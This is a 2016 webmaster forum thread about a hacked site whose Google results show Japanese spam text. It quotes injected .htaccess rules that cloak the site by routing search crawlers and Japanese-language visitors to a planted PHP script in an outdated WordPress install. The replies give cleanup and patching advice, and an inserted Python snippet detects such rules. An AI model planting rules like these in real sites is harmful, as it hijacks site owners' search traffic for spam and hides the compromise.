Forum Moderators: Ocean10000 & phranque

Is this a sign of Hacking

Host and GWT indicates the site is not hacked

     
5:04 pm on Sep 15, 2016 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month

joined:June 4, 2002
posts: 1923
votes: 3


I have a site that is showing Japanese characters for all text when the site comes up in a Google search. Yet I can go directly to the site using the domain name and the site looks fine and I can see no excess code on the home page. The hosting company can find no evidence of hacking and no warning in GWT/Search Console. I requested Google to fetch the page and index it and the Japanese characters are still showing up. I also changed the password.

However the htaccess file has code that I don't recognize (the site hasn't been worked on for over a year). All the new code is for WordPress but the owner has never used WordPress even though I can see it installed. It has one line for the Japanese language so I suspect this is the problem.

Can someone tell me if I remove this section in htaccess (see below) and remove the blog off the server if this will take care of the hacking problem? Should I change the password again once I do this?

RewriteRule ^google(.*)\.html$ /wordpress/wp-admin/network/tpl/wp-og3.php?gg=$1 [L]
RewriteCond %{HTTP_USER_AGENT} (bot|google|yahoo|aol|bing|crawl|aspseek|icio|robot|spider|nutch|slurp|msnbot) [NC]
RewriteCond %{REQUEST_FILENAME} !(wp-og3.php|xsl|css|jpg|gif|js)$ [NC]
RewriteRule ^(.*)$ /wordpress/wp-admin/network/tpl/wp-og3.php [L]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search|bing|seznam|Seznam) [NC]
RewriteCond %{HTTP:Accept-Language} ^ja.*$ [NC]
RewriteCond %{REQUEST_FILENAME} !(wp-og3.php|xsl|css|jpg|gif|js)$ [NC]
RewriteRule ^(.*)$ /wordpress/wp-admin/network/tpl/wp-og3.php [L]
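
One way to audit an .htaccess file for rules of this kind, as an added example that is not part of the original post: it pairs each RewriteCond with the RewriteRule it applies to and flags rules that hand the request to a PHP script depending on who is asking (crawler user agent, search-engine referer, Accept-Language). The function name and the keyword list are assumptions; the sample input is the rule set quoted above.

```python
import re

# The rule set quoted in the post above, copied verbatim.
SAMPLE = r"""
RewriteRule ^google(.*)\.html$ /wordpress/wp-admin/network/tpl/wp-og3.php?gg=$1 [L]
RewriteCond %{HTTP_USER_AGENT} (bot|google|yahoo|aol|bing|crawl|aspseek|icio|robot|spider|nutch|slurp|msnbot) [NC]
RewriteCond %{REQUEST_FILENAME} !(wp-og3.php|xsl|css|jpg|gif|js)$ [NC]
RewriteRule ^(.*)$ /wordpress/wp-admin/network/tpl/wp-og3.php [L]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search|bing|seznam|Seznam) [NC]
RewriteCond %{HTTP:Accept-Language} ^ja.*$ [NC]
RewriteCond %{REQUEST_FILENAME} !(wp-og3.php|xsl|css|jpg|gif|js)$ [NC]
RewriteRule ^(.*)$ /wordpress/wp-admin/network/tpl/wp-og3.php [L]
""".strip()

COND = re.compile(r"^\s*RewriteCond\s+%\{([^}]+)\}\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)
# Assumed keyword list: tokens that identify crawlers or search engines.
CRAWLER = re.compile(r"google|bing|yahoo|bot|crawl|spider|slurp", re.I)
# Request properties that describe the visitor rather than the URL.
VISITOR_VARS = {"HTTP_USER_AGENT", "HTTP_REFERER", "HTTP:ACCEPT-LANGUAGE"}

def find_cloaking_rules(text):
    """Return rewrites to a PHP script that depend on the visitor's identity."""
    findings, conds = [], []
    for n, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        m = COND.match(line)
        if m:
            conds.append((m.group(1).upper(), m.group(2)))
            continue
        m = RULE.match(line)
        if not m:
            continue
        target = m.group(2)
        signals = sorted({var for var, pat in conds if var in VISITOR_VARS
                          and (var == "HTTP:ACCEPT-LANGUAGE" or CRAWLER.search(pat))})
        conds = []  # conditions apply only to the rule that follows them
        if signals and ".php" in target.lower():
            findings.append({"line": n, "target": target, "signals": signals})
    return findings

if __name__ == "__main__":
    for f in find_cloaking_rules(SAMPLE):
        print(f"line {f['line']}: {', '.join(f['signals'])} -> {f['target']}")
```

Conditions on REQUEST_FILENAME alone, as in a stock WordPress front-controller rule, are not flagged.
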
7:24 pm on Sept 15, 2016 (gmt 0)

Administrator from US 

WebmasterWorld Administrator not2easy is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Dec 27, 2006
posts:4595
votes: 375


If the .htaccess file at the root directory is different from an older copy you (or the owner) have, I would be concerned about that server and consider finding a better host. Especially if this is a shared server, it might have been compromised to allow changes to the .htaccess file (and other files). If the server itself has been compromised, any new password may be available to the party that made the change in the first place. Can you see the date/timestamp for the htaccess file?

If there is a blog and htaccess changes not made by the site owner or without their knowledge I would certainly want it uninstalled and remove the related lines from the .htaccess file as a start. Be sure there is not a related database left on the server. Much depends on what you find that shouldn't be there, the dates of changes as to whether it is a poorly configured hosting setup or a compromised server. Has the host been contacted, are they aware of the situation?
8:51 pm on Sept 15, 2016 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:15954
votes: 898


However the htaccess file has code that I don't recognize (the site hasn't been worked on for over a year). All the new code is for WordPress but the owner has never used WordPress even though I can see it installed. It has one line for the Japanese language so I suspect this is the problem.

Please tell me your first response was to change the site passwords.

RewriteCond {various stuff}
RewriteRule ^(.*)$ /wordpress/wp-admin/network/tpl/wp-og3.php [L]
This is a nonsense rule anyway. What's the capture for, if it isn't going to be used in the redirect? Presumably the php file includes something that looks at FILENAME or REQUEST_URI-- whatever it's called in php-- so there's no need to include it in the URL.

:: irritably thinking that if the rule itself had been properly worded, there would be no need for all that css|js|etcetera stuff in the final condition, which should in any case have been the first condition, not that it's necessary to tell hackers how to improve their work ::
10:04 pm on Sept 15, 2016 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month

joined:June 4, 2002
posts: 1923
votes: 3


Instead of waiting for a reply I called the host again and he said go ahead and remove the code from the htaccess file and delete WP. It kept replicating itself so I had to get the host to finish it. And then I changed the password again. Then requested Google re-index the site again and the Google results are already recuperating an hour later.

This was apparently caused by the owner having someone install WP 3.1 a year ago without telling me and never finished it so it was never updated. (wasn't even listed in site manager as being installed which was odd). It looks like this was the avenue of access to the site. Plus the site is on an old server that needs to be updated. Not the host's fault. The owner has just let the site sit idle. There is no database.

Thanks for your help everyone.
10:16 pm on Sept 15, 2016 (gmt 0)

Senior Member

WebmasterWorld Senior Member topr8 is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Apr 19, 2002
posts:3522
votes: 89


>>Plus the site is on an old server that needs to be updated. Not the host's fault.

Is this a dedicated server run by the client? If not, how is this NOT the host's fault?
2:07 am on Sept 16, 2016 (gmt 0)

Moderator from US 

WebmasterWorld Administrator martinibuster is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Apr 13, 2002
posts:14939
votes: 497


how is this NOT the host's fault.


topr8 is right, you are not out of the woods. Your client is still in danger. While the htaccess file was directly related to the old WordPress installation, version 3.1, confirming that the entry point was WordPress and not the unpatched server (we're currently into WordPress version 4.6.1), the server itself may still present a critical problem.

As topr8 implies, your client's problem is not entirely solved. It is critical to get the server software patched up asap because your client's site is sitting on a time bomb.
3:01 am on Sept 16, 2016 (gmt 0)

Administrator from US 

WebmasterWorld Administrator not2easy is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Dec 27, 2006
posts:4595
votes: 375


it kept replicating itself

Be sure to remove the sql file that WP creates on install or it can continue to reappear. If the site owner has no databases, there should be none in the account. If the site uses CP, check the software installation tools there and the phpMyAdmin.
8:33 am on Sept 16, 2016 (gmt 0)

Administrator from GB 

WebmasterWorld Administrator engine is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:May 9, 2000
posts:26498
votes: 1090


On top of what's been mentioned, there are a couple of resources out there that might also help you.

Google's Safe Browsing Site Status [google.com...]

Sucuri has an online scanner for one-off scans that's free to use, with a more comprehensive paid version.
[sitecheck.sucuri.net...]

And, as has been said, it's important to keep the plugins and software updated. The owner leaving it for a long while without that attention is asking for problems, IMHO.
5:36 pm on Sept 16, 2016 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month

joined:June 4, 2002
posts: 1923
votes: 3


The site is not on a dedicated server. There is no database. I told the client he needs to upgrade to a new server. I removed all of WP. The site indexing is still improving in Google search. I'll keep watching it to make sure it doesn't reinfect the site.

Thanks for the info everyone.
5:37 pm on Sept 16, 2016 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month

joined:June 4, 2002
posts: 1923
votes: 3


PS. This site was never declared unsafe by Google.